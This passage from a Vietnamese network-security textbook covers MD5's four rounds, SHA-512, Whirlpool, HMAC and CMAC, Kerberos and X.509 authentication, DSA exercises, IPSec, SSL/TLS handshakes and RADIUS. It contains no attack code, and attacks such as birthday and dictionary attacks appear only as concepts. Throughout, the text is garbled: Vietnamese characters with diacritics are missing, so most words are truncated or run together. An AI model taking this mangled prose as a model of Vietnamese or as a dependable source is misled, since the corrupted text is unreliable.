    - 94 BB = B CC = C DD = D /* Vng 1: K hiu [abcd k s i] l thao tc sau a = b + ((a + F(b,c,d) + X[k] + T[i]) <<< s). */ /* Lm 16 thao tc sau y*/ [ABCD 0 7 1] [DABC 1 12 2] [CDAB 2 17 3] [BCDA 3 22 4] [ABCD 4 7 5] [DABC 5 12 6] [CDAB 6 17 7] [BCDA 7 22 8] [ABCD 8 7 9] [DABC 9 12 10] [CDAB 10 17 11] [BCDA 11 22 12] [ABCD 12 7 13] [DABC 13 12 14] [CDAB 14 17 15] [BCDA 15 22 16] /* Vng 2: K hiu [abcd k s i] l thao tc sau y a = b + ((a + G(b,c,d) + X[k] + T[i]) <<< s). */ /* Lm 16 thao tc sau y*/ [ABCD 1 5 17] [DABC 6 9 18] [CDAB 11 14 19] [BCDA 0 20 20] [ABCD 5 5 21] [DABC 10 9 22] [CDAB 15 14 23] [BCDA 4 20 24] [ABCD 9 5 25] [DABC 14 9 26] [CDAB 3 14 27] [BCDA 8 20 28] [ABCD 13 5 29] [DABC 2 9 30] [CDAB 7 14 31] [BCDA 12 20 32] /* Vng 3: K hiu [abcd k s t] l thao tc sau y a = b + ((a + H(b,c,d) + X[k] + T[i]) <<< s). */ /* Lm 16 thao tc sau y*/ [ABCD 5 4 33] [DABC 8 11 34] [CDAB 11 16 35] [BCDA 14 23 36] [ABCD 1 4 37] [DABC 4 11 38] [CDAB 7 16 39] [BCDA 10 23 40] [ABCD 13 4 41] [DABC 0 11 42] [CDAB 3 16 43] [BCDA 6 23 44] [ABCD 9 4 45] [DABC 12 11 46] [CDAB 15 16 47] [BCDA 2 23 48] /* Vng 4: K hiu [abcd k s t] l thao tc sau y a = b + ((a + I(b,c,d) + X[k] + T[i]) <<< s). */ /* Lm 16 thao tc sau y*/ [ABCD 0 6 49] [DABC 7 10 50] [CDAB 14 15 51] [BCDA 5 21 52] [ABCD 12 6 53] [DABC 3 10 54] [CDAB 10 15 55] [BCDA 1 21 56] [ABCD 8 6 57] [DABC 15 10 58] [CDAB 6 15 59] [BCDA 13 21 60] [ABCD 4 6 61] [DABC 11 10 62] [CDAB 2 15 63] [BCDA 9 21 64] /* Tnh */ A = A + AA B = B + BB C = C + CC D = D + DD end /* Kt thc vng lp trn i*/ Bc 5: Thng ip rt gn = A||B||C||D. nh gi thut ton MD5 V tc sinh ra chui ct yu th MD5 chm hn so vi MD4 nhng n li an ton hn rt nhiu so vi MD4. Thut ton s ha thng ip MD5 kh n gin thc hin, cung cp mt gi tr bm ca thng ip vi di tu . Ngi ta cho rng kh tm c 2 thng ip c cng gi tr bm l khong 264 bc tnh, v kh tm c mt thng ip vi gi tr bm cho trc l 2128 bc tnh. Tuy nhin l hng mi pht hin trong thut ton MD5 s cho php k tn cng c th to ra file gi mo trong vng vi gi vi loi my tnh t chun.

    - 95 Chun Hash an ton nng cao Vin chun cng ngh quc gia NIST xut bn bn sa FIPS 180-2 vo nm 2002, ngh b sung 3 phin bn mi ca SHA: SHA-256, SHA-384, SHA-512. Cc phin bn trn c thit k tng thch vi vic tng an ton c cung cp bi chun m nng cao AES. V cu trc v chi tit ging SHA-1, suy ra vic phn tch cng tng t, nhng mc an ton cao hn nhiu so vi SHA-1. Tng quan SHA 512

    Hm nn SHA-512 SHA-512 l trng tm ca thut ton. y x l mu tin vi cc khi 1024 bit v bao gm 80 vng

    - 96 o cp nht b m 512 bit o S dng gi tr Wt 64 bit c ly ra t block hin ti ca mu tin o V hng s quay vng da trn cn bc ba ca 80 s nguyn t u tin Hm quay vng ca SHA-512

    VI.3.3 Hm Hash Whirlpool By gi xem xt hm Hash Whirlpool, c tn thnh bi d n NESSIE ca chu u. y s dng bin i bn trong ca chun m nng cao AES lm hm nn v hng ti s dng m khi nh trc. Cht lng thc hin ca Whirrlpool snh c vi cc thut ton ni ting nh SHA. Tng quan Whirlpool c trnh by trn hnh v sau

    - 97 -

    M khi Whirlpool Whirlpool c thit k ring cho vic s dng hm Hash vi an ton v hiu qu nh chun m nng cao AES, nhng vi kch thc khi 512 bit hash. Hm v cu trc tng t nh AES nhng u vo c nh x kho lo vo 10 hng v cc a thc nguyn t khc trn GF(28). y s dng gi tr v thit k S-box khc. An ton v cht lng thc hin ca Whirlpool Whirlpool mi c xut, nn c t kinh nghim s dng. Tuy nhin n c xy dng da trn k thut ca AES c dng nhiu. C th Whirlpool cn nhiu thit b phn cng hn SHA, nhng cht lng thc hin s tt hn.

    - 98 -

    VI.3.4 Hm Hash c kho ging nh MAC Khi c cc hm Hash tt, chng ta mun c cc m xc thc mu tin MAC da trn cc hm Hash . V hm Hash thng thng nhanh hn v m ngun ca hm Hash c ph bin rng ri hn, nn vic s dng chng to nn MAC s hiu qu hn. Ta c th coi MAC l Hash bao gm c kho vi mu tin, c th c xut nh sau KeyedHash = Hash (Key | Message) Trong trng hp ny c mt s im yu c tm thy. Chnh v mun khc phc cc im yu , mt phng n kt hp Hash to nn MAC c pht trin l HMAC. VI.3.5 HMAC HMAC c thit k theo chun Internet RFC2104, s dng hm Hash trn mu tin: HMACK = Hash [(K+ XOR opad) || Hash [(K+ XOR ipad) || M)]]

    - 99 trong K+ l kho m m rng ca K v opad, ipad l cc hng b m c bit, M l mu tin. Nh vy cn tnh nhiu hn 3 hm Hash so vi nu bn tin ng mt mnh. Bt c hm Hash no cng c th c s dng trong s trn: MD5, SHA1, RIPEMD-160 hay Whirlpool. Tng quan HMAC

    An ton HMAC S an ton c chng minh lin quan n thut ton Hash nn trong s trn. Tn cng HMAC yu cu phi hoc: o Tn cng vt cn kho s dng hoc o Tn cng ngy sinh nht (tuy cn quan st s lng rt ln mu tin) C th la chn phn on hm Hash c s dng da trn tc v cc rng buc an ton. VI.3.6 CMAC Trc kia xt Thut ton xc thc d liu DAA (CBC-MAC), c s dng rng ri trong cc chnh ph v cng nghip. Nhng kch thc bn MAC c gii hn nh hn hoc bng 64 bit. C th khc phc nhc im trn bng cch s dng 2 kho v b m nh sau: phng php c vit tt t M xc thc mu tin da trn m

    - 100 (Cipher-based Message Authentication Code (CMAC) v c xut bi NIST SP800-38B: Tng quan CMAC

    VI.4 Cc ng dng xc thc Chng ta s xem xt cc hm xc thc c pht trin h tr xc thc mc ng dng v ch k in t. ng thi cng xem xt dch v xc thc dng kho ring Kerrberros. V sau xt dch v xc thc dng kho cng khai X.509. VI.4.1 Kerberos y l m hnh H thng kho my ch tin cy ca MIT (Trng i hc K thut Massachusetts) cung cp xc thc c bn th ba dng kho ring v tp trung. Cho php ngi s dng truy cp vo cc dch v phn tn trong mng. Tuy nhin khng cn thit phi tin cy mi my trm, thay v ch cn tin cy my ch xc thc trung tm. c hai phin bn ang s dng l: Kerberos 4 v Kerberos 5. 1. Cc yu cu ca Kerrberos Bo co u tin ca: Kerberos nu cc yu cu sau o An ton o Tin cy o Trong sut o C th m rng y ci t s dng th tc xc thc Needham-Schroeder. 2. Tng quan Kerberos 4

    - 101 L s xc thc dng bn th ba c bn v c my ch xc thc (AS Authentication Server). Ngi dng tha thun vi AS v danh tnh ca mnh, AS cung cp s tin cy xc thc thng qua th cp th TGT (Ticket Granting Ticket) v my ch cung cp th (TGS Ticket Granting Server). Ngi s dng thng xuyn yu cu TGS cho truy cp n cc dch v khc da trn th cp th TGT ca ngi s dng. 3. Trao i Kerberos 4 Ngi s dng nhn th c cp t my ch xc thc AS, mi th cho mt phin lm vic v cng nhn th cp dng dch v (service granting ticket) t TGT. Mi th dng cho mt dch v khc nhau c yu cu, thng qua vic trao i gia my ch/trm nhn c dch v. 4. Cc lnh a Kerberos Mi trng Kerberos bao gm: my ch Kerberos, mt s my trm c ng k vi my ch, cc my ch ng dng chia s kho vi my ch. Mt h thng nh vy c gi l mt lnh a Kerberos. Thng thng l mt min hnh chnh duy nht. Nu c nhiu lnh a, th cc my ch Kerberos cn phi chia s kho v tin cy nhau. 5. Kerberos phin bn 5 Kerberos 5 c pht trin vo gia nhng nm 1990, c thit k theo chun RFC 1510. N cung cp nhng ci tin so vi phin bn 4, c th hng ti cc thiu xt v mi trng, thut ton m, th tc mng th t byte, thi gian s dng th, truyn tip xc thc, xc thc lnh a con. V cc s khc bit v k thut nh: m kp, cc dng s dng khng chun, kho phin, chng tn cng mt khu. Sau y ta xem xt chi tit m hnh Kerberos Kerberos l mt giao thc xc thc mng, n cho php cc c nhn giao tip vi nhau trn mt mng khng an ton bng cch xc thc ngi dng ny vi ngi dng khc theo mt c ch bo mt v an ton. Kerberos ngn chn vic nghe trm thng tin cng nh tn cng thay th v m bo tnh ton vn ca d liu. Kerberos hot ng theo m hnh my trm/my ch v n thc hin qu trnh xc thc 2 chiu - c ngi dng v dch v xc thc ln nhau. Kerberos c xy dng da trn m hnh m ha kha i xng v i hi mt thnh phn th ba tin cy tham gia vo qu trnh xc thc. M t giao thc Kerberos s dng mt i tc tin cy th ba thc hin qu trnh chng thc c gi l Trung tm phn phi kha bao gm 2 phn ring bit: mt my ch chng thc (AS) v mt my ch cp th (TGS). Kerberos lm vic da trn cc th thc hin qu trnh chng thc ngi dng. Kerberos duy tr mt c s d liu cha cc kho b mt. Mi thc th trn mng (my trm hoc my ch) u chia s mt kho b mt ch gia bn thn n vi Kerberos. thc hin qu trnh giao tip gia 2 thc th, Kerberos to ra mt kho phin. Kha ny dng bo mt qu trnh tng tc gia cc thc th vi nhau. Hot ng ca Kerberos: Qu trnh hot ng ca giao thc (AS = My ch xc thc, TGS = My ch cp th, C = My trm, S = Dch v): 1. Ngi dng nhp vo tn truy cp v mt khu pha my trm. 2. My trm thc hin thut ton bm mt chiu trn mt khu c nhp vo v n tr thnh kho b mt ca my trm.

    - 102 3. My trm gi mt thng ip di dng bn r n AS yu cu dch v. Khng c kho b mt cng nh mt khu no c gi n AS. 4. AS kim tra xem c tn ti ngi dng C trong c s d liu ca n hay khng. Nu c, n gi ngc li cho my trm 2 thng ip: o Thng ip A: cha kho phin My trm/TGS c m ha bi kho b mt ca ngi dng. o Thng ip B: cha Th (bao gm ID ca my trm, a ch mng ca my trm, k hn th c gi tr v mt kho phin my trm/TGS) c m ha s dng kho b mt ca TGS. 5. Khi my trm nhn c thng ip A v B, n gii m thng ip A ly kho phin my trm/TGS. Kho phin ny c s dng cho qu trnh giao i tip theo vi TGS. y my trm khng th gii m thng ip B bi v n c m ha bi kho b mt ca TGS. 6. Khi yu cu dch v (S), my trm gi 2 thng ip sau n TGS: o Thng ip C: Gm thng ip B v ID ca dch v c yu cu o Thng ip D: cha Authenticator (gm ID my trm v nhn thi gian timestamp) c m ha bi kho phin My trm/TGS. 7. Khi nhn c thng ip C v D, TGS gii m thng ip D s dng kho phin my trm/TGS v gi 2 thng ip ngc li cho my trm: o Thng ip E: cha th (my trm n my ch) (bao gm ID my trm, a ch mng ca my trm, k hn th c gi tr v mt kho phin my trm/dch v) c m ha bi kho b mt ca dch v. o Thng ip F: cha kho phin ca my trm/my ch c m ha bi kho phin my trm/TGS. 8. Khi nhn c thng ip E v F, my trm sau gi mt Authenticator mi v mt th (my trm n my ch) n my ch cha dch v c yu cu. o Thng ip G: cha th (my trm n my ch) c m ha s dng kho b mt ca my ch. o Thng ip H: mt Authenticator mi cha ID my trm, Timestamp v c m ha s dng kho phin my trm/my ch. 9. Sau , my ch gii m th s dng kho b mt ca chnh n, v gi mt thng ip cho my trm xc nhn tnh hp l thc s ca my trm v s sn sng cung cp dch v cho my trm. o Thng ip I: cha gi tr Timestamp trong Authenticator c gi bi my trm s c cng thm 1, c m ha bi kho phin my trm/my ch. 10. My trm s gii m s xc nhn ny s dng kha chia s gia n vi my ch, v kim tra xem gi tr timestamp c c cp nht ng hay khng. Nu ng, my trm c th tin tng my ch v bt u a ra cc yu cu dch v gi n my ch. 11. My ch cung cp dch v c yu cu n my trm. Hn ch ca Kerberos Kerberos thch hp cho vic cung cp cc dch v xc thc, phn quyn v bo m tnh mt ca thng tin trao i trong phm vi mt mng hay mt tp hp nh cc mng. Tuy nhin, n khng tht thch hp cho mt s chc nng khc, chng hn nh k in t (yu cu p ng c hai nhu cu xc thc v bo m khng chi ci c). Mt trong nhng gi thit quan trng ca giao thc Kerberos l cc my ch trn mng cn phi tin

    - 103 cy c. Ngoi ra, nu ngi dng chn nhng mt khu d on th h thng d b mt an ton trc kiu tn cng t in, tc l k tn cng s s dng phng thc n gin l th nhiu mt khu khc nhau cho n khi tm c gi tr ng. Do h thng hon ton da trn mt khu xc thc ngi dng, nu bn thn cc mt khu b nh cp th kh nng tn cng h thng l khng c gii hn. iu ny dn n mt yu cu rt cn bn l Trung tm phn phi kha cn c bo v nghim ngt. Nu khng th ton b h thng s tr nn mt an ton. Ton vn d liu i vi mi h bo mt ton vn d liu l mt yu cu khng th thiu, m bo tnh ton vn d liu thc s, cc thut m ho nh m ho bm, m xc nhn thng ip (MAC) v ch k in t c th cng c trin khai ng lot. V c bn, nhng bin php ny s dng cc hm mt chiu, ngha l d liu khng th b gii m ngay c khi bit kho m ho n. VI.4.2 Dch v xc thc X.509 Dch v xc thc X.509 l mt phn ca chun dch v th mc CCITT X.500. y cc my ch phn tn bo tr c s d liu thng tin ca ngi s dng v xc nh khung cho cc dch v xc thc. Th mc cha cc chng nhn kho cng khai, kho cng khai ca ngi s dng c k bi ch quyn chng nhn. thng nht dch v cng xc nh cc th tc xc thc, s dng m kho cng khai v ch k in t. Tuy thut ton khng chun nhng c RSA xut. Cc chng nhn X.509 c s dng rng ri. 1. Cc chng nhn X.509 c pht hnh bi Ch quyn chng nhn (Certification Authority CA) bao gm: o Cc phin bn 1,2 hoc 3 o S s (duy nht vi CA) xc nh chng nhn o Thut ton xc nh ch k o Xut bn tn X.500 (CA) o Chu k hiu lc (t-n ngy) o i tng ca tn X.500 (tn ca ngi s hu) o i tng thng tin kho cng khai (thut ton, cc tham s,kho) o nh danh duy nht xut bn (phin bn 2+) o nh danh duy nht i tng (phin bn 2+) o Cc trng m rng (phin bn 3) o Ch k (hoc hash ca cc trng trong chng nhn) K hiu CA<<A>> l chng nhn cho A c k bi CA 2. Nhn chng nhn Ngi s dng bt k c th trao i vi CA nhn c chng nhn. Ch CA c th sa chng nhn. V khng th b gi mo nn chng nhn c th c t trong th mc cng cng. 3. S phn cp CA Nu c hai ngi s dng chia s chung CA th h c gi thit l bit kho cng khai ca CA . Ngc li cc CA cn to nn s phn cp trao i chng nhn vi nhau. S dng chng nhn lin kt cc thnh vin ca s c c chng nhn ca cc CA khc. Mi CA c th gi tip (forward) cc chng nhn ca mnh cho clients v c th gi li (backward) chng nhn ca mnh cho cha ca n. Mi client tin tng cc

    - 104 chng nhn ca cha. C th kim chng chng nhn bt k ca mt CA cho ngi s dng bng cc CA khc trong s phn cp. 4. S thu hi chng nhn Giy chng nhn c chu k s dng, c th thu hi trc thi hn trong nhng trng hp cn thit nh: kho ring ca ngi s dng b l, ngi dng khng tip tc c chng nhn bi CA , Giy chng nhn ca CA b lm hi. Ni chung CA bo tr danh sch cc chng nhn b thu h (CRL Certificate Revocation List). Ngi s dng c th kim tra li cc chng nhn b thu hi. 5. Cc th tc xc thc X.509 bao gm ba th tc xc thc ty chn: xc thc mt chiu, xc thc hai chiu v xc thc ba chiu. Mi th tc trn u s dng cc ch k kho cng khai. Xc thc mt chiu Mt chiu A->B c s dng thit lp o Danh tnh ca A v rng mu tin l t A o Mu tin c gi cho B o Tnh ton vn v gc gc ca mu tin Mu tin c th bao gm c nhn thi gian, k hiu c trng ca mu tin (nonce), danh tnh ca B v n c k bi A. C th bao gm mt s thng tin b sung cho B nh kho phin. Xc thc hai chiu Hai mu tin A->B v B->A c thit lp, ngoi mu tin t A n B nh trn cn c: o Danh tnh ca B v tr li t B o Tr li ny dnh cho A o Tnh ton vn v gc gc ca tr li Tr li bao gm c k hiu c trng ca mu tin (nonce) t A, c nhn thi gian v k hiu c trng tr li t B. C th bao gm mt s thng tin b sung cho A. Xc thc ba chiu Ba mu tin A->B, B->A v A->B c thit lp nh trn m khng c ng h ng b. Ngoi 2 chiu nh trn cn c tr li li t A n B cha bn sao nonce ca tr li t B, ngha l cc nhn thi gian m khng cn kim tra. X.509 phin bn 3 Trong phin bn 3 c b sung mt s thng tin cn thit trong giy chng nhn nh: Email/URL, chi tit v t pht hnh, cc rng buc s dng. Tt hn ht l t tn tng minh cho cc ct mi xc nh trong phng php m rng tng qut. Cc m rng bao gm: o Danh tnh m rng o Ch dn tnh quan trng o Gi tr m rng Cc m rng xc thc Kho v cc thng tin t pht hnh o Bao trm thng tin v i tng, kho ngi pht hnh, ch th kiu pht hnh, chng nhn i tng chng nhn v cc thuc tnh ngi pht hnh o H tr c tn ph, nh dng ph cho cc i tng v ngi pht hnh Chng nhn cc rng buc pht hnh o Cho php s dng cc rng buc trong chng nhn bi cc CA khc

    - 105 Bi tp 1. Ch k in t DSA: Cho p = 23, q = 11, h=3 Tnh g NSA A chn kho ring xA = 7, tnh kho cng khai ca yA ca A Cho bn Hash ca M l H(M) = 15 Chn s ngu nhin k = 6 Tnh ch k in t ca A: (r, s) Nu cch ngi nhn kim chng ch k in t ca A trn bn tin M. 2. Ch k in t DSA: Cho p = 53, q = 13, h=5 Tnh g NSA A chn kho ring xA = 11, tnh kho cng khai ca yA ca A Cho bn Hash ca M l H(M) = 17 Chn s ngu nhin k = 9 Tnh ch k in t ca A: (r, s) Nu cch ngi nhn kim chng ch k in t ca A trn bn tin M. 3. Hy cho bit cc phng php phn phi kho cng khai. V cc cch trao i cng khai kho mt gia hai ngi s dng 4. Nu s khc bit gia MAC v Hash v nu tc dng ca chng. Cho mt s v d v cc hm MAC v Hash. 5. Cho bit HMAC l g, s dng chng vo mc ch no. 6. Nu mt s cch to v kim chng ch k in t 7. Chng minh Nghch l Ngy sinh nht, tc l c t nht 23 ngi, th xc sut c hai ngi trng ngy sinh nht s ln hn hoc bng 0.5. 8. Cc hm s hc v logic c bn no dng trong MD5? 9. Cc hm s hc v logic c bn no dng trong SHA-1? 10. Cc hm s hc v logic c bn no dng trong RIPEMD-160? 11. Trnh by hot ng ca cc giao thc xc thc trn m hnh Kerberos. 12. Nu ni dung dch v xc thc X.509.

    - 106 CHNG 7: AN TON IP V WEB Trong chng ny chng ta s xt n c ch an ton IPSec v mt s giao thc bo mt lp vn chuyn ng dng trn Web. VII.1 An ton IP C kh nhiu c ch an ton ng dng chuyn bit nh: S/MIME, PGP, Kerberos, SSL/HTTPS. Tuy nhin c nhng c ch an ton m xuyn sut nhiu tng ng dng nh l c ch an ton IP c ci t trn mng cho mi ng dng. VII.1.1 IPSec IPSec l c ch an ton IP tng quan. N cung cp: xc thc, bo mt v qun tr kho. IPSec c dng trn mng LAN, mng WAN ring v chung v trn c mng Internet. Li ch ca IPSec IPSec trn bc tng la/router cung cp an ton mnh cho mi vic truyn qua vnh ai. N chng li vic i vng qua bc tng la/router. IPSec nm tng vn chuyn bn di nn trong sut vi mi ng dng v c th trong sut vi ngi s dng u cui. N c th cung cp an ton cho ngi s dng ring bit v bo v kin trc r nhnh. VII.1.2 Kin trc an ton IP c t an ton IP rt phc tp, c nh ngha qua mt s chun (RFC): bao gm RFC 2401/2402/2406/2408 v c nhiu chun khc c nhm theo loi. iu ny l bt buc i vi IP6 v tu chn vi IP4. C hai m rng an ton cho phn u: Phn u xc thc (AH Authentication Header) Ti trng an ton ng gi (ESP Encapsulating Security Payload) 1. Dch v IPSec IPSec nhm t cc mc ch sau: kim sot truy cp, ton vn khng kt ni, xc thc ngun gc d liu, t chi ti li gi (y l mt dng ca ton vn lin kt tng phn), bo mt (m ho), bo mt lung vn chuyn c gii hn. 2. Lin kt an ton Quan h mt chiu gia ngi gi v ngi nhn m cung cp s an ton cho lung vn chuyn v c xc nh bi 3 tham s o Ch s tham s an ton o a ch IP ch o Tn ca th tc an ton Ngoi ra c mt s cc tham s khc nh: ch s dy (sequence number), thng tin v phn u xc thc v phn u m rng AH & EH, thi gian sng. C lu tr c s d liu ca cc lin kt an ton. 3. Phn u xc thc (Authentication Header - AH) AH cung cp s h tr cho an ton d liu v xc thc ca cc gi IP: o H thng u cui/chuyn mch c th xc thc ngi s dng/ng dng

    - 107 o Ngn tn cng theo di a ch bng vic theo di cc ch s dy. AH da trn s dng MAC: HMACMD596 hoc HMAC SHA -1-96 Mun vy cc bn cn chia s kho mt. 4. Ti trng an ton ng gi (ESP) ESP m bo bo mt ni dung mu tin v lung vn chuyn gii hn, c la chn cung cp dch v xc thc v h tr phm vi rng cc m, cc ch m, b m o Bao gm DES, Triple DES, RC5, IDEA, CAST, o CBC v cc ch khc o B m cn thit lp y cc kch thc khi, cc trng cho lung vn chuyn 5. Ch vn chuyn v ch ng ESP ESP c s dng vi 2 ch : vn chuyn v ng. Trong ch ng khng cn gi tng minh a ch ch. Ch vn ti c s dng m v tu chn xc thc d liu IP: o D liu c bo v nhng phn u vn r bit a ch ch o C th phn tch vn chuyn mt cch hiu qu o Tt i vi ESP my ch vn chuyn ti my ch Ch ng m ton b gi IP o B sung phn u mi cho bc nhy tip o Tt cho mng ring o VPN (Virtual Private Network), cng n cng an ton 6. Kt hp cc lin kt an ton Cc lin kt an ton c th ci t qua AH hoc ESP. ci t c hai cn kt hp cc lin kt an ton o To nn b cc lin kt an ton o C th kt thc ti cc im cui cng nhau hoc khc nhau o Kt hp bi k vn chuyn v ng lp Cn bn lun v th t xc thc v m ho 7. Qun tr kho Qun l sinh kho v phn phi kho gia cc bn trao i thng tin, thng thng cn hai cp kho, 2 kho trn mt hng cho AH v ESP. Trong c ch Qun tr kho th cng, ngi qun tr h thng thit lp cu hnh cho tng h thng. Trong c ch Qun tr kho t ng: o H thng t ng da vo yu cu v kho cho cc lin kt an ton trong h thng ln. o C cc thnh phn nh th tc trao i kha Oakley v lin kt an ton trn mng ISAKMP 8. Oakley Oakley l th tc trao i kho, da trn trao i kho Diffie-Hellman. y b sung cc c trng khc phc cc im yu nh Cookies, nhm (tham s tng th), cc ch s c trng (nonces), trao i kho Diffie Hellman vi vic xc thc. C th s dng s hc trn trng s nguyn t hoc ng cong elip. 9. ISAKMP ISAKMP lin kt an ton trn Internet v th tc qun tr kho. N cung cp khung qun l kho, xc nh cc th tc v nh dng gi thit lp, tha thun, iu

    - 108 chnh v xo cc lin kt an ton (SA Secure Associations). ISAKMP c lp vi th tc trao i kho, thut ton m ho v phng php xc thc Trao i v ti trng ISAKMP C mt s kiu ti trng ISAKMP: an ton, xut, dng vn chuyn, kho, nh danh, chng nhn, hash, ch k, nonce v xo. ISAKMP c b khung cho 5 kiu trao i mu tin:c s, bo v nh danh, xc thc, tch cc v thng tin. VII.2 An ton Web VII.2.1 Khi nim Web ngy cng c s dng rng ri bi cc cng ty, chnh ph v c nhn, nhng Internet v Web c nhng l hng ln v c nhiu mi e do an ton nh: o Tnh ton vn o Bo mt o T chi dch v o Xc thc Nh vy cn b sung c ch bo mt cho Web. VII.2.2 SSL (Secure Socket Layer) SSL l dch v an ton tng vn chuyn, ban u c pht trin bi Netscape. Sau phin bn 3 ca n c thit k cho u vo cng cng v tr thnh chun Internet, c bit n nh an ton tng vn chuyn TLS (Transport Layer Security). SSL s dng giao thc TCP cung cp dch v u cui n cui tin cy v c 2 tng th tc VII.2.3 Kin trc SSL

    y kt ni SSL l: o Tm thi, u cui n u cui, lin kt trao i o Gn cht vi 1 phin SSL V phin SSL: o Lin kt gia ngi s dng v my ch o c to bi th tc HandShake Protocol

    - 109 o Xc nh mt tp cc tham s m ho o C th chia s bi kt ni SSL lp 1. Dch v th tc bn ghi SSL Dch v th tc bn ghi SSL m bo tnh ton vn ca bn tin: o S dng MAC vi kho mt chia s o Ging nh HMAC nhng vi b m khc v cung cp bo mt: o S dng m i xng vi kho chung xc nh bi th tc HandShake. o IDEA, RC2-40, DES-40, DES, 3DES, Fortezza, RC4-40, RC4-128 o Bn tin c nn trc khi m 2. Th tc thay i c t m SSL (SSL Change Cipher Spec Protocol): y l mt trong 3 giao thc chuyn bit ca SSL s dng th tc bn ghi SSL. y l mu tin n, buc trng thi treo tr thnh hin thi v cp nht b m ang dng 3. Th tc nhc nh SSL (SSL Alert Protocol) Truyn i li nhc ca SSL lin quan cho thnh vin. Nghim khc: nhc nh hoc cnh bo Nhc nh c bit: o cnh bo: mu tin khng ch i, bn ghi MAC ti, li gii nn, li Handshake, tham s khng hp l o Nhc nh: ng ghi ch, khng chng nhn, chng nhn ti, chng nhn khng c h tr, chng nhn b thu hi, chng nhn qu hn, chng nhn khng c bit n. Nn v m nh mi d liu SSL 4. Th tc bt tay SSL (SSL HandShake Protocol) Th tc ny cho php my ch v my trm: o Xc thc nhau o Tha thun thut ton m ho v MAC o Tha thun kho m s dng N bao gm mt lot cc thng tin: o Thit lp cc kh nng an ton o Xc thc my ch v trao i kho o Xc thc my trm v trao i kho o Kt thc

    - 110 -

    5. An ton tng vn chuyn IETF chun RFC 2246 ging nh SSLv3. Vi khc bit nh: o s k hiu kch thc bn ghi o s dng HMAC thay cho MAC o hm gi ngu nhin tng mt o c m ghi ch b sung o c mt s thay i h tr m o thay i kiu chng nhn v tha thun o thay i b m v tnh ton m Sau y ta xem xt chi tit giao thc xc thc ngi dng RADIUS v giao thc SSL: Giao thc RADIUS RADIUS l mt dch v dnh cho vic xc nhn v cho php ngi dng truy cp t xa qua cc thit b nh mdem, DSL, cp mng hoc cc thit b khng dy khc. Mt site thng thng c mt my ch truy cp c kt ni vo mt modem. Mt my ch dch v RADIUS c kt ni vo mng nh mt dch v xc nhn. Nhng ngi dng t xa gi vo my ch truy cp, my ch s yu cu nhng dch v xc nhn t my ch dch v RADIUS. My ch dch v RADIUS s xc nhn ngi dng v cho php h truy cp ti nguyn.Nhng nh qun tr mng to ra nhng h s v ngi dng my ch RADIUS,xc nh cc quyn hn cp cho ngi dng t xa. Nhng giao thc hi p c s dng trong sut qu trnh ngi dng vo mng.

    - 111 Giao thc SSL c pht trin bi Netscape, giao thc SSL c s dng rng ri trn mng Internet trong vic xc thc v m ho thng tin gia my trm v my ch. Trong khi SSL c th s dng h tr cc giao dch an ton cho rt nhiu ng dng khc nhau trn Internet. SSL khng phi l mt giao thc n l, m l mt tp cc th tc c chun ho thc hin cc nhim v bo mt sau: Xc thc my ch: Cho php ngi s dng xc thc c my ch mun kt ni. Lc ny, pha browser s dng cc k thut m ho cng khai chc chn rng chng ch v kho cng cng ca my ch l c gi tr v c cp pht bi mt CA trong danh sch cc CA ng tin cy ca my trm. Xc thc my trm: Cho php pha my ch xc thc c ngi s dng mun kt ni. Pha my ch cng s dng cc k thut m ho cng khai kim tra xem chng ch v kho cng cng ca my ch c gi tr hay khng v c cp pht bi mt CA trong danh sch cc CA ng tin cy khng. M ho kt ni: Tt c cc thng tin trao i gia my trm v my ch c m ho trn ng truyn nhm nng cao kh nng bo mt. Hot ng ca SSL Giao thc SSL hot ng da trn hai nhm con giao thc l giao thc bt tay v giao thc bn ghi. Giao thc bt tay xc nh cc tham s giao dch gia hai i tng c nhu cu trao i thng tin hoc d liu, cn giao thc bn ghi xc nh khun dng cho tin hnh m ho v truyn tin hai chiu gia hai i tng .Giao thc SSL bt tay s s dng SSL bn ghi trao i mt s thng tin gia my ch v my trm vo ln u tin thit lp kt ni SSL. Mt giao dch SSL thng bt u bi qu trnh bt tay gia hai bn. Cc bc trong qu trnh bt tay c th nh sau: 1. My trm s gi cho my ch s phin bn SSL ang dng, cc tham s ca thut ton m ho, d liu c to ra ngu nhin (ch k s) v mt s thng tin khc m my ch cn thit lp kt ni vi my trm 2. My ch gi cho my trm s phin bn SSL ang dng, cc tham s ca thut ton m ho, d liu c to ra ngu nhin v mt s thng tin khc m my trm cn thit lp kt ni vi my ch. Ngoi ra my ch cng gi chng ch ca n n my trm v yu cu chng ch ca my trm nu cn. 3. My trm s dng mt s thng tin m my ch gi n xc thc my ch. Nu nh my ch khng c xc thc th ngi s dng s c cnh bo v kt ni khng c thit lp. Cn nu nh xc thc c my ch th pha my trm s thc hin tip bc 4. 4. S dng tt c cc thng tin c to ra trong giai on bt tay trn, my trm (cng vi s cng tc ca my ch v ph thuc vo thut ton c s dng) s to ra premaster secret cho phin lm vic, m ho bng kho cng khai m my ch gi n trong chng ch bc 2, v gi n my ch. 5. Nu my ch c yu cu xc thc my trm, th pha my trm s nh du vo phn thng tin ring ch lin quan n qu trnh bt tay ny m hai bn u bit. Trong trng hp ny, my trm s gi c thng tin c nh du v chng ch ca mnh cng vi premaster secret c m ho ti my ch.

    - 112 6. My ch s xc thc my trm. Trng hp my trm khng c xc thc, phin lm vic s b ngt. Cn nu my trm c xc thc thnh cng, my ch s s dng kho b mt gii m premaster secret, sau thc hin mt s bc to ra master secret. 7. My trm v my ch s s dng master secret to ra cc kho phin , chnh l cc kho i xng c s dng m ho v gii m cc thng tin trong phin lm vic v kim tra tnh ton vn d liu. 8. My trm s gi mt li nhn n my ch thng bo rng cc thng ip tip theo s c m ho bng kho phin. Sau n gi mt li nhn c m ho thng bo rng pha my trm kt thc giai on bt tay. 9. My ch cng gi mt li nhn n my trm thng bo rng cc thng ip tip theo s c m ho bng kho phin. Sau n gi mt li nhn c m ho thng bo rng my ch kt thc giai on bt tay. 10. Lc ny giai on bt tay hon thnh, v phin lm vic SSL bt u. C hai pha my trm v my ch s s dng cc kho phin m ho v gii m thng tin trao i gia hai bn, v kim tra tnh ton vn d liu VII.3 Thanh ton in t an ton VII.3.1 Yu cu y l m m v c t an ton nhm bo v thanh ton th tn dng trn Internet. N c pht trin nm 1996 bi Master, Visa Card v khng phi h thng tr tin. Thanh ton in t an ton l tp cc giao thc v nh dng an ton dng o Trao i an ton gia cc i tc o Tin tng v s dng X509v3 o Ring bit v hn ch thng tin cho ngi cn Cc thnh phn Thanh ton in t

